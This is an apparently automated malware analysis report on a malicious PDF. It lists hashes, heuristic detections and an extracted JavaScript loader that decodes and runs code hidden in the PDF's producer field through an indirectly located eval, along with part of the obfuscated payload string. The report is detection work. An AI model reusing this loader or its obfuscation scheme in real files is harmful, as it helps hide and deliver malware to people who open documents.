Malicious PDF — malware analysis report

Static analysis result for SHA-256 4d57d8a7d9ea9bb7…

MALICIOUS

PDF

25.0 KB Created: 2011-72-51 03:25:00 First seen: 2026-05-08
MD5: 690079b7b8d58aa1c87cca21ff081af9 SHA-1: 673df5541562298404d17173db027f2ed97142ce SHA-256: 4d57d8a7d9ea9bb7158e08b04178246d6a4f43c965369c9bb12ece96ee982b78
114 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    /Producer (String.fromCharCodet9.5*wqt4.t5*wqt8.5*wq8*wqt4.5*wqt6.5*wqt8.75*wqt5.75*wq15.t5*wq9.75*wq9.t5*wqt9.t5*wq14.t5*wq1t*wq14.t5*wq1t*wq9.t5*wqt9.t5*wq14.t5*wq1t*wq14.t5*wq1t*wq9.t5*wqt9.t5*wq1t.t5*wq13.5*wqt5.t5*wqt4.5*wq9.t5*wqt9.t5*wq1t.75*wqt5.t5*wqt4.5*wq14.t5*wq9.t5*wqt9.t5*wq1t*wq1t*wq1t*wq1t.t5*wq9.t5*wqt9.t5*wq14*wqt4.5*wq1t*wq1t*wq9.t5*wqt9.t5*wq1t.5*wq13*wq1t.75*wq13*wq9.t5*wqt9.t5*wqt5.5*wq13.75*wq14*wq14.t5*wq9.t5*wqt9.t5*wq1t.75*wqt5.t5*wq14*wq1t*wq9.t5*wqt9.t5*wq13.75*wq13*w …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x61EA 352 bytes
SHA-256: 9e20b4875e86ca266924ad5e628f73d8449f215047dc89a28b715d0d74239d66
Preview script
First 1,000 lines of the extracted script
var qweval=5;
for(var i in this) {
	if (i.indexOf('qwe') != -1) {
		utq=this[i.replace('qw','')];
	}
}
utq('vcf=this.producer');
releg=utq(vcf.substr(0,19));
vcf = vcf.substr(19);
vcf = vcf.replace(/t/g,'2');
ar = vcf.split('q');
var s = '';
w = 4;
for (i = 0; i < ar.length; i++) {
	umwb = utq(ar[i]);
	s += releg(umwb);
}
utq(s);

Open this report in the interactive analyzer, or submit your own file for analysis.